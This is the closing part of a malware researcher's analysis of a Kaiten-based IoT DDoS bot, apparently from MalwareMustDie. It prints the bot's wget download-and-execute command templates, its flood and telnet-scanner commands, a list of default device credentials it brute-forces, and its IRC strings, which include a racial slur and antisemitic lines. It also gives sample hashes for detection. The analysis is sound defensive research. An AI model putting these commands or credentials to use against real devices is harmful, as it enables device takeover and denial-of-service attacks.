 INSTALL                // export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | \
                        // sed 's#.*/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt \
                        // exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" \
                        // /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")
 BINUPDATE              // export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | \
                        // sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && \
                        // cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && \
                        // ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"
 LOCKUP                 // export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin; \
                           wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)
 BASH                   // export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s

          (flood commands)

 UDP                    // UDP <target> <port, 0 for random> <secs>
 STD                    // STD <target> <port> <secs>
 UNKNOWN                // UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs>
 HTTP                   // HTTP <method> <target> <port> <path> <time> <power>
 HOLD                   // HOLD <ip> <port> <time>
 JUNK                   // JUNK <ip> <port> <time>
 BLACKNURSE             // BLACKNURSE <target ip> <secs>
 DNS                    // DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> // dns amp

          (telnet scanner command)

 AK47SCAN               // AK47SCAN <ON/OFF>      // telnet scanner, connect to AK-47 server to scan targets on TCP/23 and TCP/2323


           (telnet credentials aimed)

(users)         (passwords)
 root            password      oelinux1   service
 admin           Zte521        realtek    145
 guest           vizxv         1111       4321
 default         00000         54321      tech
 user            14567         antslq     abc1
 daemon          hi3518        zte9x15    switch
 adm             pass          system     meinsm
 telnet          admin14       1456       smcadmin
 Administrator   7ujMko0admin  888888     14567890
 mg3500          00000000      ikwb       anko
 admin1          <>            juantech   merlin
 ubnt            klv1          xc3511     zlxx.
 support         klv14         1111111    

           (user-agents & HTTP headers for HTTP request non-flood, for download etc)

GET /%s HTTP/1.1\r\n
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\n
Host: %s:80\r\n
Accept: */*\r\n
Connection: Keep-Alive\r\n
\r\n"

           (user-agents for HTTP flood)

Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1


           (For signature scanning purpose use these stupid IRC bot msg strings)

tfw no gf
frienzoned
tyf
pos
cunts
keksec
keksec rox
keksec ROX
get raped
not a ddos packet
also not a ddos packet
seriously not a ddos packet
Host: goatse.info
Host: tubgirl.ca
Host: goatse.info
Host: tubgirl.ca
8======D~~~~~~~
suck it
give succ
big nigger dick 8============================D
( . Y . ) tiddies
bigkek
eye pee rape
eye pee address rape
IP rape
This is LOIC
LOIC
HOIC
XOIC
LHXOIC
A cat is fine too. Desudesudesu~
the biiiiig pussy
benis
penis
dick
vagina
clitoris
pussy
tfw
dic pic?
send nudes
https://youtu.be/dQw4w9WgXcQ
Never gonna give you up
Never gonna make you cry
Never gonna let you die
Never gonna hurt you
bush did 9/11
jet fuel can't melt steel beams
9/11 was an inside job
the illuminati is real
wake up sheep
i flex like david ike
6 million jews? show me the proof!
T R I G G E R E D
free masons suck cock
ihatejews
urgay
tfw u like dick
dickbutt
The elusive dickbut
Heyyy that's pretty gooood
NSA sucks cock
FBI sucks cock
You name it they suck cockWhat am I doing with my life
Oh yeah I like nulling shit
HIIYYOOOOOOO (Customgrow420)
Keemstar is a fucking knome
Leafy is gawd <3
Ourmine is full of skids
STC is the greatest

Epilogue

Many more interesting information, it's too detail to write, such as checking duplication bot by parsing memory. And AK-47 scanner communication method is coded uniquely, etc.

Hash

See the hashes below for more info:

MD5 (igLHvijzbFarm) = d7062a6b3380c1c5c79fd0aec06051c5
MD5 (igLHvijzbFarm5) = bb4d558ef723daa5e014aeaa5337df7c
MD5 (igLHvijzbFarm6) = f469f4130e1d267f63ede66cb4341e0d
MD5 (igLHvijzbFm68k) = 581b9b9d6230005fa3a5ab1e9090eb9a
MD5 (igLHvijzbFmips) = e71c7c5f0b09c3b17e0064b5774499f9
MD5 (igLHvijzbFmpsl) = 4f0724e3775f872eafcc70a0a946b0df
MD5 (igLHvijzbFppc) = a1c60716c51c64a89f96167057b51c68
MD5 (igLHvijzbFsh4) = 9aa4741ad010753683a602bf7a2d99cd
MD5 (igLHvijzbFspc) = 604de8c8f3d612bcbfc44f1e3c4b2e33

Case#: MMD20200522-kaiten-ak47-freak

---

unixfreaxjp - MalwareMustDie!